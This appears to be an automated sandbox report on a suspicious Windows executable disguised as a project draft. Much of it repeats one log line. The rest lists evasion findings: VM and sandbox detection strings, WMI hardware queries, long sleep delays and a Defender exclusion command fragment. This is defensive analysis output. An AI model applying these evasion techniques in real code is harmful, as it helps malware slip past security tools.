                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 0.2.CO DRAFT Al Zaytounah project.exe.3291bc8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.681428409.0000000003370000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: CO DRAFT Al Zaytounah project.exe PID: 6960, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681428409.0000000003370000.00000004.00000001.sdmp, CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681428409.0000000003370000.00000004.00000001.sdmp, CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe TID: 6964Thread sleep time: -33676s >= -30000s
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe TID: 7016Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6472Thread sleep time: -8301034833169293s >= -30000s
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe TID: 5500Thread sleep time: -14757395258967632s >= -30000s
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe TID: 5652Thread sleep count: 1026 > 30
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe TID: 5652Thread sleep count: 8825 > 30
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6302
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2131
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeWindow / User API: threadDelayed 1026
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeWindow / User API: threadDelayed 8825
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeThread delayed: delay time: 33676
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeThread delayed: delay time: 922337203685477
                      Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.930054155.0000000000E97000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu
                      Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess token adjusted: Debug
